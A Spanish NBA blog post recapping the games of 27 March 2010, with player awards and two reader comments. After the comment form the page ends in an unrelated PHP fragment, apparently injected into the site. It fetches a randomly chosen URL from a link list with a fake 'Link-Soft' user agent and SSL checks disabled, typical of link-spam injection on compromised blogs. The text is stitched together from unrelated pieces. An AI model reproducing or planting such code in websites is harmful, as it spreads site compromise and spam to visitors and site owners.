La Crónica (27/03/2010)

28 de March de 2010 por Viva_Dirk

Anoche asistimos al mayor robo de la temporada. Nada menos que una hora de sueño y de fin de semana nos han quitado, y mientras eso sucedía se disputaron 5 partidos de muy distinta índole.

Los Jazz no tuvieron problema alguno para ganar en la capital con un gran partido de su “Big three” particular: 64 puntos, 26 rebotes y 19 asistencias sumaron entre Deron, Boozer y Okur, aunque para llegar a su máximo nivel necesitan a Kirilenko. En los Wizards ven como Blatche, a pesar de sus problemas de disciplina, sigue jugando grandes partidos y Livingston vuelve a ser un jugador de baloncesto.

Portland se afianza aún más en play-offs ganando en New Orleans con todas las piezas haciendo lo que McMillan quiere. El plan implica ver a Rudy actuando como un simple especialista en el triple. Una lástima que otros técnicos no puedan aprovechar al español como se merece. Por los Hornets el mejor fue Darren Collison.A los Bulls no les quedó mas remedio que ganar un partido y es que jugaban en casa contra los Nets. Lo hicieron en la mejor actuaciónd de la temporada de Pargo y con Taj Gibson confirmándose como la mejor noticia del año para Chicago. En los Nets buen partido del rookie T.Williams.

Los Lakers se desquitaron del ridículo ante los Thunders dejando a los Rockets 20 abajo al final del tercer cuarto con Kobe rozando el triple doble, Pau anotando e intimidando y Odom con un 13-13. La resistencia la pusieron Brooks y sobre todo un super clase como Scola que está haciendo todo lo necesario para firmar un señor contrato este verano, crisis incluida.

Y en el último partido de la noche, en un choque que tendrá un olor a vengaza eterno, los Mavs ganaron fácil a los Warriors con un bestial Tolliver para los perdedores y un colosal Beaubois para los ganadores.

PREMIOS

MPV: Rodrigue Beaubois se exhibió ayer con 40 puntos, 8 rebotes, 3 asistencias, 3 tapones, 68% en tiros de campo y un 82% en triples. BEAUSTIAL.

Rookie: Sin contar al MVP, se queda con el premio Taj Gibson, un claro miembro del club de albañilería y fontanería que de vez en cuando nos deja actuaciones como la de ayer, 22 puntos y 13 rebotes. Darren Collison hizo 20 puntos y 5 asistencias, pero no parece carburar con Paul, como es normal.

Sorpresa: Otro premio que sería para Beaubois y que se queda otro jugador de los Bulls porque ver 27 puntos, 4 rebotes y 5 asistencias de Jannero Pargo este año es para llamar a Iker Jimenez y contárselo. Lo de Tolliver en este final de temporada no es tanta sorpresa, pero no se cogen 21 rebotes todos los días.

Decepción: No encontramos una gran decepción esta madrugada, pero vistos nuestros votos para mejor entrenador del año, bien podríamos dárselo Nate McMillan.

MEV: Premio sin duda para Luis Scola que plantó cara a los Lakers con 28 puntos, 10 rebotes y 5 asistencias con un 12 de 16 en tiros de campo.

Comenta

2 comentarios a esta entrada

  1. Love Denise dice:
    #1

    El 9 de 11 de Beaubois y los 21 rebotes de Tolliver en sólo 28 minutos, pueden ser unas de las mejores marcas de los últimos años. no?

      Citar

  2. Txusma dice:
    #2

    JR Smith se cascó 11 triples el año pasado de 18 intentos, Stojakovic se hizo un 10 de 13 en 2007 que tampoco está nada mal y bueno, en 2006 Ben Gordon acabó el partido con un 9 de 9

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>